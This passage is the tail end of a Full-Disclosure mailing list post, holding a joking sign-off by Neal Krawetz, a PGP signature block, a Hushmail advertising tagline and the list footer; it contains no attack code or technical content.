Coincidence? I think not!)  Also, with this many young females
online, I might need to trade my significant other M. in for a more
attractive model.  ;-)

EHAP WATCH OUT!

- - Dr. Neal Krawetz
Author of Advanced Desktop Window Resizing Techniques in Ubuntu


-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYjcY8ACgkQDpFP8dW5K4ZbCgP/c5Tqp/4Z6QE6FB43gvasKxwm3KA4
66zC/HjQMM5jC/SxMBHk759K/q9dq9nVv4oaR1Osg1rYrctiLE4aEwPSVzBW9OHNLQKH
Hq97z7LYpORPqYz3mq2VHtlFZ0nzyxucrR8iFlKRONmG3XH5ayIB4ByEr/WJwjs4l4eV
KwGxFrs=
=aXrc
-END PGP SIGNATURE-

--
Click here for free information on nursing jobs, up to $150/hour
http://tagline.hushmail.com/fc/CAaCXv1Rz1wOFDZP5KXD87J21xOZPU5D/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/